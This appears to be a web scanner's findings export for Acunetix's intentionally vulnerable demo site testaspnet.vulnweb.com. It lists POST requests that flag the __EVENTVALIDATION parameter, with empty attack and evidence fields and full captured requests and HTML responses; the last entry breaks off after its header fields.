URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1133 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,133 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8431&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAnhgeA9sIZGRkHpX2TNA5NSi2pDj87ag8lGw0NFU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKfvZKZDQLQp5LlBALTp%2BrACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna%2F1AgLmna%2F1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ%2FmBQLmnZ%2FmBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY%2FcDALmnY%2FcDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE%2FAvukoT8C%2B6TV0wkC%2B6TV0wkC%2B6TJ9gIC%2B6TJ9gIC%2B6T9jQoC%2B6T9jQoC%2B6SRoAMC%2B6SRoAMC%2B6SFxwwC%2B6SFxwwC%2B6T5rAkC%2B6T5rAkC%2B6TtwwIC%2B6TtwwIC3Mv%2F6AUC3Mv%2F6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7%2BQ8C3Mu7%2BQ8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6%2BoCAtzL6%2BoCAtzL39MPAtzL39MPAtzL8%2FYIAtzL8%2FYIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBeLVG77bQ9lEEZ2vQdhz4NGRS2DV
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:50:05 GMT Content-Length: 12583
Response Body - size: 12,583 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBACEPnA9sIHgJTRBYBBgCAnhgeA9sIZGRkHpX2TNA5NSi2pDj87ag8lGw0NFU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKfvZKZDQLQp5LlBALTp+rACAKN96ipBgKN96ipBgLmnbveCQLmnbveCQLmna/1AgLmna/1AgLmncOJCgLmncOJCgLmnfesAwLmnfesAwLmnevDDALmnevDDALmnZ/mBQLmnZ/mBQLmnbO9DQLmnbO9DQLmnafQBgLmnafQBgLmnZu5AwLmnZu5AwLmnY/cDALmnY/cDAL7pJnFDwL7pJnFDwL7pI2YBwL7pI2YBwL7pKE/AvukoT8C+6TV0wkC+6TV0wkC+6TJ9gIC+6TJ9gIC+6T9jQoC+6T9jQoC+6SRoAMC+6SRoAMC+6SFxwwC+6SFxwwC+6T5rAkC+6T5rAkC+6TtwwIC+6TtwwIC3Mv/6AUC3Mv/6AUC3MuTjw0C3MuTjw0C3MuHogYC3MuHogYC3Mu7+Q8C3Mu7+Q8C3MuvnAcC3MuvnAcC3MvDMALcy8MwAtzL99cJAtzL99cJAtzL6+oCAtzL6+oCAtzL39MPAtzL39MPAtzL8/YIAtzL8/YIArHS3Z8KArHS3Z8KArHS8bIDArHS8bIDArHS5ckMArHS5ckMArHSmewFArHSmewFArHSjYMNArHSjYMNArHSoaYGArHSoaYGArHS1foPArHS1foPArHSyZEHArHSyZEHArHSvfkFArHSvfkFArHS0Z0NArHS0Z0NAor5owUCivmjBeLVG77bQ9lEEZ2vQdhz4NGRS2DV" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">February 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:White" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8436')" style="color:Black" title="February 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8437')" style="color:Black" title="February 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8438')" style="color:Black" title="February 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8439')" style="color:Black" title="February 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8440')" style="color:Black" title="February 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8441')" style="color:Black" title="February 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8442')" style="color:Black" title="February 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8443')" style="color:Black" title="February 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8444')" style="color:Black" title="February 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8445')" style="color:Black" title="February 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8446')" style="color:Black" title="February 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8447')" style="color:Black" title="February 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8448')" style="color:Black" title="February 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8449')" style="color:Black" title="February 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8450')" style="color:Black" title="February 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8451')" style="color:Black" title="February 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8452')" style="color:Black" title="February 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8453')" style="color:Black" title="February 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8454')" style="color:Black" title="February 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8455')" style="color:Black" title="February 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8456')" style="color:Black" title="February 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8457')" style="color:Black" title="February 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8458')" style="color:Black" title="February 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8459')" style="color:Black" title="February 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8460')" style="color:Black" title="March 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8461')" style="color:Black" title="March 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8462')" style="color:Black" title="March 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8463')" style="color:Black" title="March 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8464')" style="color:Black" title="March 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8465')" style="color:Black" title="March 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8466')" style="color:Black" title="March 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8467')" style="color:Black" title="March 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8468')" style="color:Black" title="March 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8469')" style="color:Black" title="March 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8470')" style="color:Black" title="March 11">11</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1121 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,121 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8622&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDAhL00mdsIZGRkscx2A5OWclJ8zajFQCGSB4%2FysIM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKfxfH4CAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogafxpzPKmrvkguVWbBjdhzXWAmvkA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:31:46 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgDAhL00mdsIZGRkscx2A5OWclJ8zajFQCGSB4/ysIM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKfxfH4CAKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogafxpzPKmrvkguVWbBjdhzXWAmvkA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:White" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:Black" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
